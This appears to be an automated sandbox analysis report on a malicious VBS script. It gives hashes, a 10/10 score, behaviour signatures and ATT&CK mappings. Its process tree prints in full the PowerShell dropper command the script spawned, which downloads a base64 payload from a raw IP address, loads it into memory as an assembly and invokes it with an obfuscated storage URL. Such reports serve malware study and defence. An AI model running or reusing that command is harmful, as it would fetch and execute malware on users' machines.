7fbc145717d92d4d062cee79cef674462553dfe681333bba48ccd32beb97260b

Resubmissions

14-10-2022 18:23

221014-w1l8eseae8 10

14-10-2022 18:13

221014-wt3ltsead3 10

Analysis

max time kernel
37s
max time network
44s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
14-10-2022 18:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

QJSXA02HNVFDSA_002.vbs
Size

655KB
MD5

b4b5d6de250942a76ddee880ee1e79e3
SHA1

cb510fa59d7ffe89105fccd06b987c69fc1b1481
SHA256

7fbc145717d92d4d062cee79cef674462553dfe681333bba48ccd32beb97260b
SHA512

044ed3b0da150486bd45b8484bba90ef094a2ed0ea49162115b59ad5f529633d9f277c9021882d72e2cf672e64afcaad28810170959a0c5490e5c48e97e70a6d
SSDEEP

768:K1TsI0Sed5dQRXaPlSWPk/LCFeu2ka+VLG0:ugZ2Jcy0

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1160 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1160 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1160 powershell.exe

flow	pid	process
3	1160	powershell.exe

pid	process
1160	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1160	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1424 wrote to memory of 1160	1424	WScript.exe	powershell.exe
PID 1424 wrote to memory of 1160	1424	WScript.exe	powershell.exe
PID 1424 wrote to memory of 1160	1424	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QJSXA02HNVFDSA_002.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('45989365f051-b5b8-e7d4-56eb-42259d7a=nekot&aidem=tla?txt.nysabjK/o/moc.topsppa.0a7e4-32r/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1160-55-0x0000000000000000-mapping.dmp

Download
memory/1160-57-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

Filesize
10.1MB

Download
memory/1160-59-0x00000000027A4000-0x00000000027A7000-memory.dmp

Filesize
12KB

Download
memory/1160-58-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

Filesize
11.4MB

Download
memory/1160-60-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/1160-61-0x00000000027AB000-0x00000000027CA000-memory.dmp

Filesize
124KB

Download
memory/1160-62-0x00000000027A4000-0x00000000027A7000-memory.dmp

Filesize
12KB

Download
memory/1160-63-0x00000000027AB000-0x00000000027CA000-memory.dmp

Filesize
124KB

Download
memory/1424-54-0x000007FEFBD11000-0x000007FEFBD13000-memory.dmp

Filesize
8KB

Download